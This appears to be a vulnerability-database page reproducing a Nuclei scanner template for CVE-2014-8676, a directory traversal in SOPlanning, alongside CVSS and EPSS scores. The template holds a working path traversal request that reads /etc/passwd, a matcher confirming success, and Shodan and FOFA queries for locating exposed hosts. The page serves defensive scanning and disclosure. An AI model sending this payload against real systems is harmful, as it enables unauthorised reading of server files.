Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2014-8676
HistorySep 04, 2022 - 10:15 a.m.

Simple Online Planning Tool <1.3.2 - Local File Inclusion

2022-09-0410:15:58
ProjectDiscovery
github.com

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.2 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

57.3%

SOPlanning &lt;1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.
id: CVE-2014-8676

info:
  name: Simple Online Planning Tool <1.3.2 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: |
    SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability.
  reference:
    - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
    - https://www.exploit-db.com/exploits/37604/
    - http://seclists.org/fulldisclosure/2015/Jul/44
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
    - http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2014-8676
    cwe-id: CWE-22
    epss-score: 0.00195
    epss-percentile: 0.56456
    cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: soplanning
    product: soplanning
    shodan-query: http.html:"soplanning"
    fofa-query: body="soplanning"
  tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a004630440220715636195b40ff991c03fdb2384200a99a22e309ab3dc2f6cb3f7a2c6c28719a02206a0582db5e2daabfcb4749bc783bb844f0733b0716db0ee37e9a8e8780fdc9ed:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.2 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

57.3%